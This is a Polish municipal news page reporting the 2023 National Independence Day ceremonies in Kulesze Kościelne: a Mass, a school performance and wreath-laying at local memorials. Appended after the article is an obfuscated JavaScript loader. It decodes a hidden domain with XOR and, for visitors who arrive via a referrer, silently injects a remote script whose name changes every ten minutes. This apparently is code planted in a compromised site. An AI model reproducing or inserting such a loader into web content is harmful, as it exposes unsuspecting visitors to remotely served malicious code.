Aktualności

Obchody Narodowego Święta Niepodległości w Gminie Kulesze Kościelne.

lis 13, 2023 | Aktualności

W dniu 11 listopada 2023 roku, odbyły się uroczyste obchody Narodowego Święta Niepodległości. Uroczystości rozpoczęły się o godz. 10.00 Mszą Świętą w intencji Ojczyzny w Kościele Parafialnym pw. Św. Bartłomieja w Kuleszach Kościelnych  koncelebrowaną przez Proboszcza Parafii Ks. Krzysztofa Konopkę. W nabożeństwie udział wzięli władze i pracownicy Urzędu Gminy Kulesze Kościelne z Wójtem Gminy Stefanem Grodzkim na czele,  Przewodniczący Rady Gminy Kulesze Kościelne Grzegorz Kossakowski, Sekretarz Gminy Marzena Frankowska, Dyrektor Szkoły Podstawowej w Kuleszach Kościelnych im. Kard. St. Wyszyńskiego Dorota Zielińska, Wicedyrektor Szkoły Podstawowej Mariusz Jaworowski, poczty sztandarowe Ochotniczej Straży Pożarnej oraz uczniów Szkoły Podstawowej w Kuleszach Kościelnych, a także zgromadzeni mieszkańcy.  Uczniowie Szkoły Podstawowej im. Kard. Stefana Wyszyńskiego w Kuleszach Kościelnych przygotowały część artystyczną.  Po Mszy Świętej nastąpiło odśpiewanie hymnu oraz złożenie kwiatów pod tablicą upamiętniającą ofiary okupacji niemieckiej pod budynkiem parafialnym. Następnie władze Gminy złożyły kwiaty przy pomniku Powstańców Styczniowych w miejscowości Czarnowo Biki.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);